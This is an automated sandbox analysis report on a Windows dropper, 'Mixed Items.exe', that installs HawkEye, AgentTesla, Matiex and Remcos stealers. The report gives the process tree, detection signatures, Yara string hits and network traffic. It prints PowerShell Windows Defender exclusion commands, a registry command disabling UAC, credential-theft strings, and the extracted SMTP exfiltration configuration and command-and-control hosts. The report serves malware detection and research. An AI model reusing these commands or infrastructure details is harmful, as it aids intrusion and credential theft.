Analysis Report: Mixed Items.exe

Overview

General Information

Sample Name: Mixed Items.exe
Analysis ID: 363869
MD5: 017e52146c9131dbc9487d834cdfc247
SHA1: 6dff831a7fd2a42ec3abe4c1ba51f3a9c9c6a25b
SHA256: 26c230cde9fb7544f7e3762f1abac39f6c8f0d2db0689178b223e0e68d2a6a0a
Tags: exe, RAT, RemcosRAT

Detection

HawkEye, AgentTesla, MailPassView, Matiex, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected HawkEye Keylogger
Yara detected MailPassView
Yara detected Matiex Keylogger
Yara detected Remcos RAT
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Installs a global keyboard hook
Machine Learning detection for dropped file
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Yara detected Beds Obfuscator
Yara detected WebBrowserPassView password recovery tool
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Startup

  • System is w10x64
  • Mixed Items.exe (PID: 6248 cmdline: 'C:\Users\user\Desktop\Mixed Items.exe' MD5: 017E52146C9131DBC9487D834CDFC247)
    • AdvancedRun.exe (PID: 7032 cmdline: 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 7152 cmdline: 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /SpecialRun 4101d8 7032 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2152 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6300 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4116 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Mixed Items.exe (PID: 7140 cmdline: C:\Users\user\Desktop\Mixed Items.exe MD5: 017E52146C9131DBC9487D834CDFC247)
    • Mixed Items.exe (PID: 6440 cmdline: C:\Users\user\Desktop\Mixed Items.exe MD5: 017E52146C9131DBC9487D834CDFC247)
    • Mixed Items.exe (PID: 1528 cmdline: C:\Users\user\Desktop\Mixed Items.exe MD5: 017E52146C9131DBC9487D834CDFC247)
      • hawkgoods.exe (PID: 1392 cmdline: 'C:\Users\user\AppData\Local\Temp\hawkgoods.exe' 0 MD5: FFDB58533D5D1362E896E96FB6F02A95)
      • Matiexgoods.exe (PID: 6780 cmdline: 'C:\Users\user\AppData\Local\Temp\Matiexgoods.exe' 0 MD5: 80C61B903400B534858D047DD0919F0E)
      • origigoods20.exe (PID: 6064 cmdline: 'C:\Users\user\AppData\Local\Temp\origigoods20.exe' 0 MD5: 61DC57C6575E1F3F2AE14C1B332AD2FB)
      • origigoods40.exe (PID: 5292 cmdline: 'C:\Users\user\AppData\Local\Temp\origigoods40.exe' 0 MD5: AE36F0D16230B9F41FFECBD3C5B1D660)
      • Purchase Order.exe (PID: 5352 cmdline: 'C:\Users\user\AppData\Local\Temp\Purchase Order.exe' 0 MD5: 4983412EC34657BAB4A9BD56617B9960)
  • svchost.exe (PID: 6664 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6908 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 204 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6460 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6636 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5720 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7116 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 592 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6488 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 5508 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 5536 cmdline: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' MD5: 017E52146C9131DBC9487D834CDFC247)
  • svchost.exe (PID: 5540 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 5708 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 5276 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 7024 cmdline: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' MD5: 017E52146C9131DBC9487D834CDFC247)
  • svchost.exe (PID: 5880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "sales1@midombo.comMARYolanmauluogwo@eversmtp.privateemail.com"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Purchase Order.exe | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
C:\Users\user\AppData\Local\Temp\Purchase Order.exe | REMCOS_RAT_variants | unknown | unknown
  • 0x5eae4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x5ea60:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5ea60:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5e088:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x5e6e0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5dc2c:$str_b2: Executing file:
  • 0x5ec28:$str_b3: GetDirectListeningPort
  • 0x5e4a0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x5e824:$str_b5: licence_code.txt
  • 0x5e6c8:$str_b7: \update.vbs
  • 0x5dc9c:$str_b9: Downloaded file:
  • 0x5dc68:$str_b10: Downloading file:
  • 0x5dc50:$str_b12: Failed to upload file:
  • 0x5ebf0:$str_b13: StartForward
  • 0x5ec10:$str_b14: StopForward
  • 0x5e670:$str_b15: fso.DeleteFile "
  • 0x5e604:$str_b16: On Error Resume Next
  • 0x5e6a0:$str_b17: fso.DeleteFolder "
  • 0x5dc40:$str_b18: Uploaded file:
  • 0x5dcdc:$str_b19: Unable to delete:
  • 0x5e638:$str_b20: while fso.FileExists("
C:\Users\user\AppData\Local\Temp\origigoods20.exe | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
C:\Users\user\AppData\Local\Temp\origigoods40.exe | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | JoeSecurity_Matiex | Yara detected Matiex Keylogger | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000019.00000003.321855545.0000000004361000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000019.00000003.328468981.00000000043CD000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000025.00000002.488787782.0000000000982000.00000002.00020000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
30.2.hawkgoods.exe.2be8a9c.4.raw.unpack | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
30.0.hawkgoods.exe.51fa72.3.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
30.2.hawkgoods.exe.300a1c4.5.raw.unpack | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
30.0.hawkgoods.exe.4c9c0d.1.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
30.2.hawkgoods.exe.51fa72.2.raw.unpack | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x1dc55:$key: HawkEyeKeylogger
  • 0x1fe99:$salt: 099u787978786
  • 0x1e296:$string1: HawkEye_Keylogger
  • 0x1f0e9:$string1: HawkEye_Keylogger
  • 0x1fdf9:$string1: HawkEye_Keylogger
  • 0x1e67f:$string2: holdermail.txt
  • 0x1e69f:$string2: holdermail.txt
  • 0x1e5c1:$string3: wallet.dat
  • 0x1e5d9:$string3: wallet.dat
  • 0x1e5ef:$string3: wallet.dat
  • 0x1f9bd:$string4: Keylog Records
  • 0x1fcd5:$string4: Keylog Records
  • 0x1fef1:$string5: do not script -->
  • 0x1dc3d:$string6: \pidloc.txt
  • 0x1dccb:$string7: BSPLIT
  • 0x1dcdb:$string7: BSPLIT

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5508, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , ProcessId: 5536
Sigma detected: System File Execution Location Anomaly
Source: Process started | Author: Florian Roth, Patrick Bareiss | Data: Command: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5508, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , ProcessId: 5536
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5508, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' , ProcessId: 5536

Signature Overview


AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Avira: detection malicious, Label: TR/Redcap.jajcu
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Found malware configuration
Source: 33.2.origigoods20.exe.e50000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "sales1@midombo.comMARYolanmauluogwo@eversmtp.privateemail.com"}
Source: hawkgoods.exe.1392.30.memstr | Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Metadefender: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Metadefender: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Metadefender: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | ReversingLabs: Detection: 85%
Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe | ReversingLabs: Detection: 21%
Multi AV Scanner detection for submitted file
Source: Mixed Items.exe | ReversingLabs: Detection: 17%
Yara detected Remcos RAT
Source: Yara match | File source: 00000025.00000002.488787782.0000000000982000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.490909756.0000000000A7A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPED
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 25.2.Mixed Items.exe.4031bf.3.unpack | Avira: Label: TR/Inject.vcoldi
Source: 30.2.hawkgoods.exe.4c0000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 30.2.hawkgoods.exe.4c0000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 31.0.Matiexgoods.exe.4d0000.0.unpack | Avira: Label: TR/Redcap.jajcu
Source: 30.0.hawkgoods.exe.4c0000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 30.0.hawkgoods.exe.4c0000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 31.2.Matiexgoods.exe.4d0000.0.unpack | Avira: Label: TR/Redcap.jajcu
Source: 25.2.Mixed Items.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 25.2.Mixed Items.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 25.2.Mixed Items.exe.400000.0.unpack | Avira: Label: TR/Redcap.jajcu
Source: 25.2.Mixed Items.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown | HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49747 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49760 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Mixed Items.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb | source: AdvancedRun.exe, 00000007.00000002.268206463.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000000.266715806.000000000040C000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb | source: hawkgoods.exe
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb | source: hawkgoods.exe
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb | source: hawkgoods.exe
May infect USB drives
Source: hawkgoods.exe | Binary or memory string: autorun.inf
Source: hawkgoods.exe | Binary or memory string: [autorun]
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then jmp 04D01A73h
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then jmp 04D01A73h
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then jmp 04D01A73h
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then call 04D01B20h
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]

Networking:

May check the online IP address of the machine
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: checkip.dyndns.org
Uses dynamic DNS services
Source: unknown | DNS query: name: feromo.duckdns.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.3:49731 -> 185.157.161.113:8078
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: whatismyipaddress.com | Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 104.16.155.36 104.16.155.36
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown | HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49747 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49760 version: TLS 1.0
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-EBDA9D3C78F7FA5DA1492447CFEEA8B3.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ACE03D270F49949C304CBC49EDC5CEFA.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5120AB9D8EED6517DE7E81CD470A03B1.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC805D8F9D665A8AE96BD3B687F20834.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CADB725393BA475AD7E7466656748C83.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1031025574F544F1BD64E20EEEC4AAC7.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C391B584FB3EF0C3E1226CABE1FDCB1.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C7589177DBC0A00C03B00FCEDE09850.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-EBDA9D3C78F7FA5DA1492447CFEEA8B3.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com | Connection: Keep-Alive
